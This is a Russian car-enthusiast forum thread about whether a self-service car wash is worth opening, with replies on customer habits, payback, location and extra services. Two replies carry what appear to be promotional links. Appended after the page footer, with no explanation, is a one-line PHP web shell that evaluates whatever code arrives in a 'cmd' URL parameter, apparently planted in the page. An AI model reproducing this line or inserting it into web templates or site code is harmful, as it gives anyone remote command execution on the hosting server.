+ Ответить в теме
Показано с 1 по 6 из 6

Тема: Мойка самообслуживания


  1. #1
    Мимо проходил Samuil is on a distinguished road Аватар для Samuil
    Регистрация
    16.12.2018
    Сообщений
    78

    Мойка самообслуживания

    Родилась у нас с товарищем идея открыть мойку самообслуживания. Сидим теперь и думаем, сколько денег во все это нужно вложить и когда окупится. Но есть еще вопрос: насколько эта услуга будет популярной? Поэтому хочу поинтересоваться мнением форумчан - какие мойки вы предпочитаете, обычные или мойки самообслуживания?
    Последний раз редактировалось Samuil; 06.10.2019 в 15:32.

  2. #2
    Мимо проходил Kirillov is on a distinguished road Аватар для Kirillov
    Регистрация
    13.12.2018
    Машина
    Есть
    Сообщений
    78
    Платить деньги за мойку автомобиля и при этом самому этим заниматься? нет уж, увольте. Тем более, что речь не о такой крупной экономии, чтобы стоило мыть машину самостоятельно.

  3. #3
    Мимо проходил Нибелунг is on a distinguished road Аватар для Нибелунг
    Регистрация
    14.12.2018
    Откуда
    Самый лучший на Земле
    Сообщений
    68
    Учитывая, что часто мойщики выполняют свою работу спустя рукава, я стараюсь мыть авто сам - я точно сделаю это лучше. Так что мойками самообслуживания пользуюсь чаще, чем обычными. В общем, нормальная тема, открывайте.

  4. #4
    Мимо проходил Бормен is on a distinguished road Аватар для Бормен
    Регистрация
    15.12.2018
    Машина
    Б/у
    Сообщений
    75
    Идея интересная, но без цифр мне сложно что-либо сказать. Вам в первую очередь нужно посчитать окупаемость этого бизнеса. Например, прибавьте к предполагаемой аренде еще сумму, которую нужно будет потратить на оборудование для мойки самообслуживания. За сколько можно купить такое оборудование, можете посмотреть тут https://avd-technology.ru/moyki-samoobsluzhivaniyu/

  5. #5
    Ну тема в принципе интересная. Только место нужно выбрать правильно - на фасаде возле оживленной транспортной магистрали. Иначе к Вам будут приезжать только те автомобилисты, которые либо живут, либо работают рядом. А это все-таки маловато для того, чтобы выйти в ноль и начать зарабатывать деньги. Так что в любом случае локация - это один из важнейших факторов, от которого зависит успех бизнеса.

  6. #6
    Мимо проходил Левша is on a distinguished road Аватар для Левша
    Регистрация
    12.12.2018
    Откуда
    Россия
    Машина
    Ездит
    Сообщений
    90
    Я думаю, что Вашей автомойке нужна какая-то фишка. Потому что подобных сервисов много, а вот куда именно отправится потребитель, зависит уже именно от Вас. Почему бы Вам не придумать что-то, чего нет у конкурентов? Например, можно предоставлять услуги по предпродажной подготовке автомобилей, а это же не только мойка, но и удаление запахов из салона. Это может быть востребовано в случае, если салон прокуренный. Многие такие машины попросту не рассматривают. А этот запах можно убрать с помощью сухого тумана https://www.dezfog.ru/blog/biznes-na...sukhom-tumane/

+ Ответить в теме

Похожие темы

  1. Мойка Мотора 2,0t Fsi
    от Titofff в разделе Ремонт и обслуживание
    Ответов: 7
    Последнее сообщение: 26.12.2018, 13:26
  2. Мойка радиаторов на GTI V
    от NEVO в разделе Ремонт и обслуживание
    Ответов: 3
    Последнее сообщение: 22.08.2012, 11:10
  3. Мойка в мороз.
    от Bubinskiy в разделе Ремонт и обслуживание
    Ответов: 2
    Последнее сообщение: 22.01.2010, 15:11
  4. Мойка кузова
    от keeper в разделе Курилка
    Ответов: 11
    Последнее сообщение: 09.04.2009, 12:49
  5. Мини мойка karcher
    от magnum126 в разделе Курилка
    Ответов: 8
    Последнее сообщение: 21.04.2006, 12:31

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}